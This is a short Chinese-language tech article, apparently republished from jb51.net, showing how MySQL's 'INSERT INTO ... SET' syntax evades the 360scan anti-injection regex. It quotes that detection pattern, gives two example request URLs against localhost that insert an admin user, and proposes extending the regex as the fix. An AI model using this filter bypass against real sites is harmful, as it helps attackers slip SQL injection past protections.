【 滚动资讯 24h 】 开启辅助访问
请登录 请入住吧! 快捷导航

搜索
IT
科技通信安全软件AI电商网络数据智慧IDC
数码
手机本本台机DIY硬件平板数码相机VR / AR
商情
生活服务 娱乐社会体育旅游文史维权人工智能财经医疗收藏创业培训理财
中关村商情网 首页 网络应用 网络安全与病毒防护 查看内容

Mysql语法绕过360scan insert防注入方法

2025-3-7 12:36| 发布者: CZN| 查看: 21| 评论: 0|原作者: 脚本之家|来自: jb51.net

360scan正则:INSERT\\s+INTO.+?VALUES

其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =

提交:

http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456')

提交set语法:

http://localhost/360.php?sql=insert into user set user='admin',pass='123456'

修复方法当然最好是加上set了。


鲜花
握手
雷人
路过
鸡蛋
上一篇:一些常见的PHP后门原理分析下一篇:科讯KESION CMS最新版任意文件上传WEBSHELL漏洞

相关分类

返回顶部